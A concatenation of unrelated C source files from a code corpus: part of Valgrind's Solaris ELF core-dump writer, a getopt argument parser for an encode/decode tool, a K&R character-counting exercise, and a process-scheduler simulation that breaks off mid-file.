ehdr->e_shoff = 0;
ehdr->e_shentsize = 0;
}
ehdr->e_shstrndx = 0;
}
static void fill_phdr(VKI_ESZ(Phdr) *phdr, const NSegment *seg, UInt off,
Bool really_write)
{
SizeT len = seg->end - seg->start + 1;
really_write = really_write && should_dump(seg);
VG_(memset)(phdr, 0, sizeof(*phdr));
phdr->p_type = PT_LOAD;
phdr->p_offset = off;
phdr->p_vaddr = seg->start;
phdr->p_paddr = 0;
phdr->p_filesz = really_write ? len : 0;
phdr->p_memsz = len;
phdr->p_flags = 0;
if (seg->hasR)
phdr->p_flags |= PF_R;
if (seg->hasW)
phdr->p_flags |= PF_W;
if (seg->hasX)
phdr->p_flags |= PF_X;
phdr->p_align = VKI_PAGE_SIZE;
}
/* Fills the section header at index zero when num_phdrs >= PN_XNUM. */
static void fill_zero_shdr(VKI_ESZ(Shdr) *shdr, UInt num_phdrs)
{
vg_assert(num_phdrs >= VKI_PN_XNUM);
VG_(memset)(shdr, 0, sizeof(*shdr));
shdr->sh_name = 0; // STR_NONE
shdr->sh_info = num_phdrs;
}
static void fill_prpsinfo(vki_elf_prpsinfo_t *prpsinfo,
const ThreadState *tst,
const vki_siginfo_t *si)
{
VG_(memset)(prpsinfo, 0, sizeof(*prpsinfo));
fill_thread_state(tst, &prpsinfo->pr_state, &prpsinfo->pr_sname);
prpsinfo->pr_uid = get_uid();
prpsinfo->pr_gid = get_gid();
prpsinfo->pr_pid = VG_(getpid)();
prpsinfo->pr_ppid = VG_(getppid)();
prpsinfo->pr_pgrp = VG_(getpgrp)();
prpsinfo->pr_sid = VG_(getpgrp)();
fill_scheduling_class(prpsinfo->pr_clname, sizeof(prpsinfo->pr_clname));
VG_(client_fname)(prpsinfo->pr_fname, sizeof(prpsinfo->pr_fname), True);
VG_(client_cmd_and_args)(prpsinfo->pr_psargs,
sizeof(prpsinfo->pr_psargs));
fill_argv(&prpsinfo->pr_argc, (Addr *) &prpsinfo->pr_argv);
prpsinfo->pr_envp = (char **) VG_(client_envp);
prpsinfo->pr_wstat = get_wstat(si);
prpsinfo->pr_euid = VG_(geteuid)();
prpsinfo->pr_egid = VG_(getegid)();
prpsinfo->pr_dmodel = get_dmodel();
}
static void fill_prstatus(vki_elf_prstatus_t *prs,
const ThreadState *tst,
const vki_siginfo_t *si)
{
VG_(memset)(prs, 0, sizeof(*prs));
prs->pr_flags = VKI_ELF_OLD_PR_PCINVAL;
fill_siginfo(si, &prs->pr_info, &prs->pr_cursig);
prs->pr_nlwp = VG_(count_living_threads)();
prs->pr_sighold = tst->sig_mask;
prs->pr_pid = VG_(getpid)();
prs->pr_ppid = VG_(getppid)();
prs->pr_pgrp = VG_(getpgrp)();
prs->pr_sid = VG_(getpgrp)();
fill_scheduling_class(prs->pr_clname, sizeof(prs->pr_clname));
prs->pr_who = tst->os_state.lwpid;
prs->pr_brkbase = (vki_caddr_t) VG_(brk_base);
prs->pr_brksize = VG_(brk_limit) - VG_(brk_base);
prs->pr_stkbase = (vki_caddr_t) compute_stkbase(tst);
prs->pr_stksize = tst->client_stack_szB;
fill_regset(&prs->pr_reg, tst);
}
static void fill_psinfo(vki_psinfo_t *psinfo, const ThreadState *tst,
const vki_siginfo_t *si)
{
VG_(memset)(psinfo, 0, sizeof(*psinfo));
psinfo->pr_nlwp = VG_(count_living_threads)();
psinfo->pr_uid = get_uid();
psinfo->pr_gid = get_gid();
psinfo->pr_pid = VG_(getpid)();
psinfo->pr_ppid = VG_(getppid)();
psinfo->pr_pgid = VG_(getpgrp)();
psinfo->pr_sid = VG_(getpgrp)();
psinfo->pr_euid = VG_(geteuid)();
psinfo->pr_egid = VG_(getegid)();
VG_(client_fname)(psinfo->pr_fname, sizeof(psinfo->pr_fname), True);
psinfo->pr_wstat = get_wstat(si);
VG_(client_cmd_and_args)(psinfo->pr_psargs,
sizeof(psinfo->pr_psargs));
fill_argv(&psinfo->pr_argc, (Addr *) &psinfo->pr_argv);
psinfo->pr_envp = (uintptr_t) VG_(client_envp);
psinfo->pr_dmodel = get_dmodel();
psinfo->pr_zoneid = get_zoneid();
psinfo->pr_lwp.pr_lwpid = tst->os_state.lwpid;
fill_thread_state(tst, &psinfo->pr_lwp.pr_state,
&psinfo->pr_lwp.pr_sname);
fill_scheduling_class(psinfo->pr_lwp.pr_clname,
sizeof(psinfo->pr_lwp.pr_clname));
}
static void fill_pstatus(vki_pstatus_t *pstatus,
const ThreadState *tst,
const vki_siginfo_t *si)
{
VG_(memset)(pstatus, 0, sizeof(*pstatus));
pstatus->pr_flags = VKI_PR_PCINVAL;
pstatus->pr_nlwp = VG_(count_living_threads)();
pstatus->pr_pid = VG_(getpid)();
pstatus->pr_ppid = VG_(getppid)();
pstatus->pr_pgid = VG_(getpgrp)();
pstatus->pr_sid = VG_(getpgrp)();
pstatus->pr_brkbase = (uintptr_t) VG_(brk_base);
pstatus->pr_brksize = VG_(brk_limit) - VG_(brk_base);
pstatus->pr_stkbase = (uintptr_t) compute_stkbase(tst);
pstatus->pr_stksize = tst->client_stack_szB;
pstatus->pr_dmodel = get_dmodel();
pstatus->pr_zoneid = get_zoneid();
pstatus->pr_lwp.pr_flags = VKI_PR_PCINVAL;
pstatus->pr_lwp.pr_lwpid = tst->os_state.lwpid;
fill_siginfo(si, &pstatus->pr_lwp.pr_info,
&pstatus->pr_lwp.pr_cursig);
pstatus->pr_lwp.pr_lwphold = tst->sig_mask;
fill_scheduling_class(pstatus->pr_lwp.pr_clname,
sizeof(pstatus->pr_lwp.pr_clname));
fill_regset(&pstatus->pr_lwp.pr_reg, tst);
fill_fpregset(&pstatus->pr_lwp.pr_fpreg, tst);
}
#if defined(SOLARIS_PRXREGSET_T)
static void fill_xregs(vki_prxregset_t *xregs, const ThreadState *tst)
{
const ThreadArchState *arch = (const ThreadArchState *) &tst->arch;
#if defined(VGP_x86_solaris)
VG_(memset)(xregs, 0, sizeof(*xregs));
xregs->pr_xsize = sizeof(xregs->pr_un.pr_xsave);
/* SSE */
UInt mxcsr = LibVEX_GuestX86_get_mxcsr(CONST_CAST(VexGuestX86State *,
&arch->vex));
xregs->pr_un.pr_xsave.pr_mxcsr = mxcsr;
/* XMM registers */
#define COPY_OUT_XMM(dest, src) \
do { \
dest._l[0] = src[0]; \
dest._l[1] = src[1]; \
dest._l[2] = src[2]; \
dest._l[3] = src[3]; \
} while (0);
COPY_OUT_XMM(xregs->pr_un.pr_xsave.pr_xmm[0], arch->vex.guest_XMM0);
COPY_OUT_XMM(xregs->pr_un.pr_xsave.pr_xmm[1], arch->vex.guest_XMM1);
COPY_OUT_XMM(xregs->pr_un.pr_xsave.pr_xmm[2], arch->vex.guest_XMM2);
COPY_OUT_XMM(xregs->pr_un.pr_xsave.pr_xmm[3], arch->vex.guest_XMM3);
COPY_OUT_XMM(xregs->pr_un.pr_xsave.pr_xmm[4], arch->vex.guest_XMM4);
COPY_OUT_XMM(xregs->pr_un.pr_xsave.pr_xmm[5], arch->vex.guest_XMM5);
COPY_OUT_XMM(xregs->pr_un.pr_xsave.pr_xmm[6], arch->vex.guest_XMM6);
COPY_OUT_XMM(xregs->pr_un.pr_xsave.pr_xmm[7], arch->vex.guest_XMM7);
#undef COPY_OUT_XMM
#elif defined(VGP_amd64_solaris)
VG_(memset)(xregs, 0, sizeof(*xregs));
xregs->pr_xsize = sizeof(xregs->pr_un.pr_xsave);
/* LibVEX_GuestAMD64_fxsave() requires at least 416 bytes. */
vg_assert(sizeof(xregs->pr_un.pr_xsave) >= 416);
LibVEX_GuestAMD64_fxsave(CONST_CAST(VexGuestAMD64State *, &arch->vex),
(Addr) &xregs->pr_un.pr_xsave);
#else
# error "Unknown platform"
#endif
}
#endif /* SOLARIS_PRXREGSET_T */
static void fill_utsname(struct vki_utsname *uts)
{
VG_(memset)(uts, 0, sizeof(*uts));
VG_(do_syscall3)(SYS_systeminfo, VKI_SI_SYSNAME,
(UWord) &uts->sysname, sizeof(uts->sysname));
VG_(do_syscall3)(SYS_systeminfo, VKI_SI_HOSTNAME,
(UWord) &uts->nodename, sizeof(uts->nodename));
VG_(do_syscall3)(SYS_systeminfo, VKI_SI_RELEASE,
(UWord) &uts->release, sizeof(uts->release));
VG_(do_syscall3)(SYS_systeminfo, VKI_SI_VERSION,
(UWord) &uts->version, sizeof(uts->version));
VG_(do_syscall3)(SYS_systeminfo, VKI_SI_MACHINE,
(UWord) &uts->machine, sizeof(uts->machine));
}
static vki_prcred_t *create_prcred(SizeT *size)
{
UInt group_list[VKI_NGROUPS_MAX];
Int ngroups = VG_(getgroups)(VKI_NGROUPS_MAX, group_list);
if (ngroups == -1)
ngroups = 0;
*size = sizeof(vki_prcred_t) + (ngroups - 1) * sizeof(gid_t);
vki_prcred_t *prcred = VG_(malloc)("coredump-elf.cp.1", *size);
VG_(memset)(prcred, 0, *size);
prcred->pr_euid = VG_(geteuid)();
prcred->pr_ruid = get_uid();
prcred->pr_suid = prcred->pr_euid;
prcred->pr_egid = VG_(getegid)();
prcred->pr_rgid = get_gid();
prcred->pr_sgid = prcred->pr_egid;
prcred->pr_ngroups = ngroups;
UInt i;
for (i = 0; i < ngroups; i++)
prcred->pr_groups[i] = group_list[i];
return prcred;
}
static void fill_core_content(vki_core_content_t *content)
{
*content = VKI_CC_CONTENT_STACK | VKI_CC_CONTENT_HEAP
| VKI_CC_CONTENT_SHANON | VKI_CC_CONTENT_TEXT
| VKI_CC_CONTENT_DATA | VKI_CC_CONTENT_RODATA
| VKI_CC_CONTENT_ANON | VKI_CC_CONTENT_SHM
| VKI_CC_CONTENT_ISM | VKI_CC_CONTENT_DISM;
}
static vki_prpriv_t *create_prpriv(SizeT *size)
{
Int fd = VG_(fd_open)("/proc/self/priv", O_RDONLY, 0);
if (fd < 0)
return NULL;
struct vg_stat stats;
if (VG_(fstat)(fd, &stats) != 0) {
VG_(close)(fd);
return NULL;
}
vki_prpriv_t *prpriv = VG_(malloc)("coredump-elf.cp.1", stats.size);
if (VG_(read)(fd, prpriv, stats.size) != stats.size) {
VG_(free)(prpriv);
VG_(close)(fd);
return NULL;
}
VG_(close)(fd);
*size = stats.size;
return prpriv;
}
static vki_priv_impl_info_t *create_priv_info(SizeT *size)
{
/* Size of the returned priv_impl_info_t is apriori unkown. */
vki_priv_impl_info_t first_cut[100];
SysRes sres = VG_(do_syscall5)(SYS_privsys, VKI_PRIVSYS_GETIMPLINFO,
0, 0, (UWord) first_cut,
sizeof(first_cut));
if (sr_isError(sres))
return NULL;
SizeT real_size = first_cut[0].priv_headersize
+ first_cut[0].priv_globalinfosize;
vki_priv_impl_info_t *priv_info = VG_(malloc)("coredump-elf.cpi.1",
real_size);
if (real_size <= sizeof(first_cut)) {
/* if the first_cut was large enough */
VG_(memcpy)(priv_info, first_cut, real_size);
} else {
/* otherwise repeat the syscall with buffer large enough */
sres = VG_(do_syscall5)(SYS_privsys, VKI_PRIVSYS_GETIMPLINFO,
0, 0, (UWord) priv_info, real_size);
if (sr_isError(sres)) {
VG_(free)(priv_info);
return NULL;
}
}
*size = real_size;
return priv_info;
}
static void fill_lwpsinfo(vki_lwpsinfo_t *lwp,
const ThreadState *tst)
{
VG_(memset)(lwp, 0, sizeof(*lwp));
lwp->pr_lwpid = tst->os_state.lwpid;
fill_thread_state(tst, &lwp->pr_state, &lwp->pr_sname);
fill_scheduling_class(lwp->pr_clname, sizeof(lwp->pr_clname));
}
static void fill_lwpstatus(vki_lwpstatus_t *lwp,
const ThreadState *tst,
const vki_siginfo_t *si)
{
VG_(memset)(lwp, 0, sizeof(*lwp));
lwp->pr_flags = VKI_PR_PCINVAL;
lwp->pr_lwpid = tst->os_state.lwpid;
fill_siginfo(si, &lwp->pr_info, &lwp->pr_cursig);
fill_scheduling_class(lwp->pr_clname, sizeof(lwp->pr_clname));
fill_regset(&lwp->pr_reg, tst);
fill_fpregset(&lwp->pr_fpreg, tst);
}
static void fill_old_note_for_thread(note_t **notes,
const ThreadState *tst,
const vki_siginfo_t *si)
{
vki_elf_prstatus_t prstatus;
fill_prstatus(&prstatus, tst, si);
add_note(notes, VKI_NT_PRSTATUS, &prstatus, sizeof(vki_elf_prstatus_t));
vki_fpregset_t fpu;
fill_fpregset(&fpu, tst);
add_note(notes, VKI_NT_PRFPREG, &fpu, sizeof(vki_fpregset_t));
#if defined(SOLARIS_PRXREGSET_T)
if (should_dump_xregs(tst)) {
vki_prxregset_t xregs;
fill_xregs(&xregs, tst);
add_note(notes, VKI_NT_PRXREG, &xregs, sizeof(vki_prxregset_t));
}
#endif /* SOLARIS_PRXREGSET_T */
}
static void fill_new_note_for_thread(note_t **notes,
const ThreadState *tst,
const vki_siginfo_t *si)
{
vki_lwpsinfo_t lwpsinfo;
fill_lwpsinfo(&lwpsinfo, tst);
add_note(notes, VKI_NT_LWPSINFO, &lwpsinfo, sizeof(vki_lwpsinfo_t));
vki_lwpstatus_t lwpstatus;
fill_lwpstatus(&lwpstatus, tst, si);
add_note(notes, VKI_NT_LWPSTATUS, &lwpstatus, sizeof(vki_lwpstatus_t));
#if defined(SOLARIS_PRXREGSET_T)
if (should_dump_xregs(tst)) {
vki_prxregset_t xregs;
fill_xregs(&xregs, tst);
add_note(notes, VKI_NT_PRXREG, &xregs, sizeof(vki_prxregset_t));
}
#endif /* SOLARIS_PRXREGSET_T */
}
/*====================================================================*/
/*=== Note utility functions ===*/
/*====================================================================*/
static void add_note(note_t **list, UInt type, const void *data,
UInt datasz)
{
UInt note_size = sizeof(note_t) + VG_ROUNDUP(datasz, 4);
note_t *n = VG_(malloc)("coredump-elf.an.1", note_size);
VG_(memset)(n, 0, note_size);
n->nhdr.n_type = type;
n->nhdr.n_namesz = 5;
n->nhdr.n_descsz = VG_ROUNDUP(datasz, 4);
VG_(memcpy)(n->name, "CORE", 4);
VG_(memcpy)(n->data, data, datasz);
if (*list == NULL) {
*list = n;
return;
}
note_t *tail = *list;
while (tail->next != NULL)
tail = tail->next;
tail->next = n;
}
static UInt note_size(const note_t *note)
{
return sizeof(note_t) - sizeof(note_t *) + note->nhdr.n_descsz;
}
static UInt notes_size(const note_t *list)
{
UInt size = 0;
const note_t *note;
for (note = list; note != NULL; note = note->next)
size += note_size(note);
return size;
}
static void fill_notes_phdr(VKI_ESZ(Phdr) *phdr, UInt offset,
UInt size_of_notes)
{
phdr->p_type = PT_NOTE;
phdr->p_offset = offset;
phdr->p_vaddr = 0;
phdr->p_paddr = 0;
phdr->p_filesz = size_of_notes;
phdr->p_memsz = 0;
phdr->p_flags = PF_R;
phdr->p_align = 0;
}
static void write_notes(Int fd, const HChar *filename,
const note_t *list)
{
const note_t *note;
for (note = list; note != NULL; note = note->next)
write_part(fd, filename, CONST_CAST(void *, ¬e->nhdr),
note_size(note), "notes");
}
static void free_notes(note_t *list)
{
while (list != NULL) {
note_t *next = list->next;
VG_(free)(list);
list = next;
}
}
/*====================================================================*/
/*=== Main coredump function ===*/
/*====================================================================*/
void VG_(make_coredump)(ThreadId tid, const vki_siginfo_t *si,
ULong max_size)
{
const HChar *basename = "vgcore";
const HChar *coreext = "";
Int core_fd;
if (VG_(clo_log_fname_expanded) != NULL) {
coreext = ".core";
basename = VG_(expand_file_name)("--log-file",
VG_(clo_log_fname_expanded));
}
vg_assert(coreext != NULL);
vg_assert(basename != NULL);
UInt filename_size = VG_(strlen)(coreext) + VG_(strlen)(basename)
+ 100; /* for the two %d's */
HChar *filename = VG_(malloc)("coredump-elf.mc.1", filename_size);
/* Try to come with a non-existent coredump filename. */
UInt seq = 0;
for (;;) {
Int oflags = VKI_O_CREAT|VKI_O_WRONLY|VKI_O_EXCL|VKI_O_TRUNC;
if (seq == 0)
VG_(snprintf)(filename, filename_size, "%s%s.%d",
basename, coreext, VG_(getpid)());
else
VG_(snprintf)(filename, filename_size, "%s%s.%d.%d",
basename, coreext, VG_(getpid)(), seq);
seq++;
#ifdef VKI_O_LARGEFILE
oflags |= VKI_O_LARGEFILE;
#endif
SysRes sres = VG_(open)(filename, oflags,
VKI_S_IRUSR|VKI_S_IWUSR);
if (!sr_isError(sres)) {
core_fd = sr_Res(sres);
break;
}
if (sr_isError(sres) && sr_Err(sres) != VKI_EEXIST) {
VG_(umsg)("Cannot create coredump file %s (%lu)\n",
filename, sr_Err(sres));
VG_(free)(filename);
return;
}
}
/* Get the client segments. Free seg_starts after use. */
Int n_seg_starts;
Addr *seg_starts = VG_(get_segment_starts)(SkFileC | SkAnonC | SkShmC,
&n_seg_starts);
/* Count how many memory segments to dump. */
Int i;
UInt num_phdrs = 2; /* two CORE note sections */
for (i = 0; i < n_seg_starts; i++) {
if (!may_dump(VG_(am_find_nsegment)(seg_starts[i])))
continue;
num_phdrs++;
}
VKI_ESZ(Ehdr) ehdr;
fill_ehdr(&ehdr, num_phdrs);
VKI_ESZ(Shdr) shdr;
if (ehdr.e_shnum > 0)
fill_zero_shdr(&shdr, num_phdrs);
UInt phdrs_size = num_phdrs * ehdr.e_phentsize;
/* Construct the old-style notes. */
note_t *old_notes = NULL;
vki_elf_prpsinfo_t prpsinfo;
fill_prpsinfo(&prpsinfo, &VG_(threads)[tid], si);
add_note(&old_notes, VKI_NT_PRPSINFO, &prpsinfo,
sizeof(vki_elf_prpsinfo_t));
HChar platform[256 + 1];
fill_platform(platform, sizeof(platform));
add_note(&old_notes, VKI_NT_PLATFORM, platform,
VG_(strlen)(platform) + 1);
add_note(&old_notes, VKI_NT_AUXV, VG_(client_auxv),
count_auxv() * sizeof(auxv_t));
/* Add detail about the faulting thread as the first note.
This is how gdb determines which thread faulted. Note that
mdb does not need such aid. */
fill_old_note_for_thread(&old_notes, &VG_(threads)[tid], si);
/* Now add details for all threads except the one that faulted. */
ThreadId t_idx;
for (t_idx = 1; t_idx < VG_N_THREADS; t_idx++)
if ((VG_(threads)[t_idx].status != VgTs_Empty) &&
(VG_(threads)[t_idx].status != VgTs_Zombie)) {
if (t_idx == tid)
continue;
fill_old_note_for_thread(&old_notes, &VG_(threads)[t_idx], si);
}
/* Construct the new-style notes. */
note_t *new_notes = NULL;
vki_psinfo_t psinfo;
fill_psinfo(&psinfo, &VG_(threads)[tid], si);
add_note(&new_notes, VKI_NT_PSINFO, &psinfo, sizeof(vki_psinfo_t));
vki_pstatus_t pstatus;
fill_pstatus(&pstatus, &VG_(threads)[tid], si);
add_note(&new_notes, VKI_NT_PSTATUS, &pstatus, sizeof(vki_pstatus_t));
add_note(&new_notes, VKI_NT_PLATFORM, platform,
VG_(strlen)(platform) + 1);
add_note(&new_notes, VKI_NT_AUXV, VG_(client_auxv),
count_auxv() * sizeof(auxv_t));
struct vki_utsname uts;
fill_utsname(&uts);
add_note(&new_notes, VKI_NT_UTSNAME, &uts,
sizeof(struct vki_utsname));
SizeT prcred_size;
vki_prcred_t *prcred = create_prcred(&prcred_size);
if (prcred != NULL) {
add_note(&new_notes, VKI_NT_PRCRED, prcred, prcred_size);
VG_(free)(prcred);
}
vki_core_content_t core_content;
fill_core_content(&core_content);
add_note(&new_notes, VKI_NT_CONTENT, &core_content,
sizeof(vki_core_content_t));
SizeT priv_size;
vki_prpriv_t *prpriv = create_prpriv(&priv_size);
if (prpriv != NULL) {
add_note(&new_notes, VKI_NT_PRPRIV, prpriv, priv_size);
VG_(free)(prpriv);
}
vki_priv_impl_info_t *priv_info = create_priv_info(&priv_size);
if (priv_info != NULL) {
add_note(&new_notes, VKI_NT_PRPRIVINFO, priv_info, priv_size);
VG_(free)(priv_info);
}
HChar zonename[VKI_ZONENAME_MAX + 1];
fill_zonename(zonename, sizeof(zonename));
add_note(&new_notes, VKI_NT_ZONENAME, zonename,
VG_(strlen)(zonename) + 1);
/* Add detail about the faulting thread as the first note.
This is how gdb determines which thread faulted. Note that
mdb does not need such aid. */
fill_new_note_for_thread(&new_notes, &VG_(threads)[tid], si);
/* Now add details for all threads except the one that faulted. */
for (t_idx = 1; t_idx < VG_N_THREADS; t_idx++) {
if ((VG_(threads)[t_idx].status != VgTs_Empty) &&
(VG_(threads)[t_idx].status != VgTs_Zombie)) {
if (t_idx == tid)
continue;
fill_new_note_for_thread(&new_notes, &VG_(threads)[t_idx], si);
}
}
VKI_ESZ(Phdr) *phdrs = VG_(malloc)("coredump-elf.mc.2", phdrs_size);
UInt size_of_notes = notes_size(old_notes);
UInt offset = ehdr.e_ehsize + phdrs_size +
(ehdr.e_shnum * ehdr.e_shentsize);
/* fill program header for old notes */
fill_notes_phdr(&phdrs[0], offset, size_of_notes);
offset += size_of_notes;
size_of_notes = notes_size(new_notes);
/* fill program header for new notes */
fill_notes_phdr(&phdrs[1], offset, size_of_notes);
offset += size_of_notes;
/* fill program headers for segments */
UInt idx;
for (i = 0, idx = 2; i < n_seg_starts; i++) {
NSegment const *seg = VG_(am_find_nsegment)(seg_starts[i]);
if (!may_dump(seg))
continue;
fill_phdr(&phdrs[idx], seg, offset,
(seg->end - seg->start + 1 + offset) < max_size);
offset += phdrs[idx].p_filesz;
idx++;
}
/* write everything out */
write_part(core_fd, filename, &ehdr, sizeof(ehdr),
"elf headers");
write_part(core_fd, filename, phdrs, phdrs_size,
"program headers");
if (ehdr.e_shnum > 0)
write_part(core_fd, filename, &shdr, sizeof(shdr),
"section headers");
write_notes(core_fd, filename, old_notes);
write_notes(core_fd, filename, new_notes);
VG_(lseek)(core_fd, phdrs[2].p_offset, VKI_SEEK_SET);
for (i = 0, idx = 2; i < n_seg_starts; i++) {
NSegment const *seg = VG_(am_find_nsegment)(seg_starts[i]);
if (!should_dump(seg))
continue;
if (phdrs[idx].p_filesz > 0) {
Off64T off = VG_(lseek)(core_fd, phdrs[idx].p_offset,
VKI_SEEK_SET);
vg_assert(off == phdrs[idx].p_offset);
vg_assert(seg->end - seg->start + 1 >= phdrs[idx].p_filesz);
write_part(core_fd, filename, (void *) seg->start,
phdrs[idx].p_filesz, "program segment");
}
idx++;
}
VG_(close)(core_fd);
VG_(free)(filename);
VG_(free)(phdrs);
free_notes(old_notes);
free_notes(new_notes);
VG_(free)(seg_starts);
}
#endif
/*--------------------------------------------------------------------*/
/*--- end ---*/
/*--------------------------------------------------------------------*/
|
the_stack_data/322636.c | /*
*
* Aniruddha. A ([email protected])
*/
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <stdbool.h>
#define PRINT_USAGE \
printf ("Usage: %s [-h] <-e|-d> -k <key> -f <file>\n", argv[0])
void handle_args (int argc, char **argv, int *encode, int *decode,
char **file, char **key)
{
int c;
bool help = false;
short margs = 0;
if (argc < 2) {
PRINT_USAGE;
exit(1);
}
*key = *file = NULL;
*encode = *decode = 0;
opterr = 0;
while ((c = getopt (argc, argv, "hedk:f:")) != -1)
switch (c)
{
case 'e':
*encode = 1;
margs++;
break;
case 'd':
*decode = 1;
margs++;
break;
case 'k':
*key = optarg;
margs++;
break;
case 'f':
*file = optarg;
margs++;
break;
case 'h':
help = true;
break;
case '?':
if ( (optopt == 'k') || (optopt == 'f') )
fprintf (stderr, "Option -%c requires an argument (%s).\n",
optopt,
(optopt =='k') ? "key" : "filename");
else if (isprint (optopt))
fprintf (stderr, "Unknown option `-%c'.\n", optopt);
else
fprintf (stderr,
"Unknown option character `\\x%x'.\n",
optopt);
exit(1);
default:
printf("Unknown : abort\n");
abort ();
}
if (help) {
PRINT_USAGE;
printf (" -h : This help text\n"
" -k : Specify a 16 byte key\n"
" -e : Encode the file contents with key\n"
" -d : Decode the file contents with key\n"
" -f : File to encode/decode\n"
" Note: The file is read as ASCII character stream\n"
" while encode and as hex stream while decode\n");
exit(1);
}
if (*encode && *decode) {
fprintf (stderr,"Use either encode(-e) or decode(-d) \n");
exit(1);
}
if (margs < 3) {
PRINT_USAGE;
fprintf(stderr," A key(-k), file(-f), and either Encode(-e)\n"
" or decode (-d) are mandatory arguments\n");
exit(1);
}
if (strlen(*key) != 16) {
fprintf(stderr, "Key length has to be 16\n");
exit(1);
}
}
#if 0
int main (int argc, char **argv)
{
int encode = 0;
int decode = 0;
char *key = NULL;
char *file = NULL;
handle_args (argc, argv, &encode, &decode, &key, &file);
printf ("encode = %d, decode = %d, key = %s file = %s\n",
encode, decode, key, file );
return 0;
}
//for (index = optind; index < argc; index++)
// printf ("Non-option argument %s\n", argv[index]);
#endif
|
the_stack_data/145322.c | /* Exercise 1-8
Write a program to count blanks, tabs, and newlines.
*/
#include <stdio.h>
void count_special_char() {
int temp;
int blank, tab, newline, other;
blank = tab = newline = other = 0;
while ((temp = getchar()) != EOF) {
switch (temp) {
case '\n':
newline++;
break;
case '\t':
tab++;
break;
case ' ':
blank++;
break;
case '\0':
break;
default:
other++;
break;
}
}
printf("# of blanks: %d; # of tabs: %d; # of newlines: %d; # of other char: %d\n", blank, tab, newline, other);
}
|
the_stack_data/225144414.c | /* -*- Last-Edit: Wed May 7 10:12:52 1993 by Monica; -*- */
#include <stdio.h>
/* A job descriptor. */
#define NULL 0
#define NEW_JOB 1
#define UPGRADE_PRIO 2
#define BLOCK 3
#define UNBLOCK 4
#define QUANTUM_EXPIRE 5
#define FINISH 6
#define FLUSH 7
#define MAXPRIO 3
typedef struct _job {
struct _job *next, *prev; /* Next and Previous in job list. */
int val ; /* Id-value of program. */
short priority; /* Its priority. */
} Ele, *Ele_Ptr;
typedef struct list /* doubly linked list */
{
Ele *first;
Ele *last;
int mem_count; /* member count */
} List;
/*-----------------------------------------------------------------------------
new_ele
alloates a new element with value as num.
-----------------------------------------------------------------------------*/
Ele* new_ele(new_num)
int new_num;
{
Ele *ele;
ele =(Ele *)malloc(sizeof(Ele));
ele->next = NULL;
ele->prev = NULL;
ele->val = new_num;
return ele;
}
/*-----------------------------------------------------------------------------
new_list
allocates, initializes and returns a new list.
Note that if the argument compare() is provided, this list can be
made into an ordered list. see insert_ele().
-----------------------------------------------------------------------------*/
List *new_list()
{
List *list;
list = (List *)malloc(sizeof(List));
list->first = NULL;
list->last = NULL;
list->mem_count = 0;
return (list);
}
/*-----------------------------------------------------------------------------
append_ele
appends the new_ele to the list. If list is null, a new
list is created. The modified list is returned.
-----------------------------------------------------------------------------*/
List *append_ele(a_list, a_ele)
List *a_list;
Ele *a_ele;
{
if (!a_list)
a_list = new_list(); /* make list without compare function */
a_ele->prev = a_list->last; /* insert at the tail */
if (a_list->last)
a_list->last->next = a_ele;
else
a_list->first = a_ele;
a_list->last = a_ele;
a_ele->next = NULL;
a_list->mem_count++;
return (a_list);
}
/*-----------------------------------------------------------------------------
find_nth
fetches the nth element of the list (count starts at 1)
-----------------------------------------------------------------------------*/
Ele *find_nth(f_list, n)
List *f_list;
int n;
{
Ele *f_ele;
int i;
if (!f_list)
return NULL;
f_ele = f_list->first;
for (i=1; f_ele && (i<n); i++)
f_ele = f_ele->next;
return f_ele;
}
/*-----------------------------------------------------------------------------
del_ele
deletes the old_ele from the list.
Note: even if list becomes empty after deletion, the list
node is not deallocated.
-----------------------------------------------------------------------------*/
List *del_ele(d_list, d_ele)
List *d_list;
Ele *d_ele;
{
if (!d_list || !d_ele)
return (NULL);
if (d_ele->next)
d_ele->next->prev = d_ele->prev;
else
d_list->last = d_ele->prev;
if (d_ele->prev)
d_ele->prev->next = d_ele->next;
else
d_list->first = d_ele->next;
/* KEEP d_ele's data & pointers intact!! */
d_list->mem_count--;
return (d_list);
}
/*-----------------------------------------------------------------------------
free_ele
deallocate the ptr. Caution: The ptr should point to an object
allocated in a single call to malloc.
-----------------------------------------------------------------------------*/
void free_ele(ptr)
Ele *ptr;
{
free(ptr);
}
int alloc_proc_num;
int num_processes;
Ele* cur_proc;
List *prio_queue[MAXPRIO+1]; /* 0th element unused */
List *block_queue;
void
finish_process()
{
schedule();
if (cur_proc)
{
fprintf(stdout, "%d ", cur_proc->val);
free_ele(cur_proc);
num_processes--;
}
}
void
finish_all_processes()
{
int i;
int total;
total = num_processes;
for (i=0; i<total; i++)
finish_process();
}
schedule()
{
int i;
cur_proc = NULL;
for (i=MAXPRIO; i > 0; i--)
{
if (prio_queue[i]->mem_count > 0)
{
cur_proc = prio_queue[i]->first;
prio_queue[i] = del_ele(prio_queue[i], cur_proc);
return;
}
}
}
void
upgrade_process_prio(prio, ratio)
int prio;
float ratio;
{
int count;
int n;
Ele *proc;
List *src_queue, *dest_queue;
if (prio >= MAXPRIO)
return;
src_queue = prio_queue[prio];
dest_queue = prio_queue[prio+1];
count = src_queue->mem_count;
if (count > 0)
{
n = (int) (count*ratio + 1);
proc = find_nth(src_queue, n);
if (proc) {
src_queue = del_ele(src_queue, proc);
/* append to appropriate prio queue
proc->priority = prio; */
dest_queue = append_ele(dest_queue, proc);
}
}
}
void
unblock_process(ratio)
float ratio;
{
int count;
int n;
Ele *proc;
int prio;
if (block_queue)
{
count = block_queue->mem_count;
n = (int) (count*ratio + 1);
proc = find_nth(block_queue, n);
if (proc) {
block_queue = del_ele(block_queue, proc);
/* append to appropriate prio queue */
prio = proc->priority;
prio_queue[prio] = append_ele(prio_queue[prio], proc);
}
}
}
void quantum_expire()
{
int prio;
schedule();
if (cur_proc)
{
prio = cur_proc->priority;
prio_queue[prio] = append_ele(prio_queue[prio], cur_proc);
}
}
void
block_process()
{
schedule();
if (cur_proc)
{
block_queue = append_ele(block_queue, cur_proc);
}
}
Ele * new_process(prio)
int prio;
{
Ele *proc;
proc = new_ele(alloc_proc_num++);
proc->priority = prio;
num_processes++;
return proc;
}
void add_process(prio)
int prio;
{
Ele *proc;
proc = new_process(prio);
prio_queue[prio] = append_ele(prio_queue[prio], proc);
}
void init_prio_queue(prio, num_proc)
int prio;
int num_proc;
{
List *queue;
Ele *proc;
int i;
queue = new_list();
for (i=0; i<num_proc; i++)
{
proc = new_process(prio);
queue = append_ele(queue, proc);
}
prio_queue[prio] = queue;
}
void initialize()
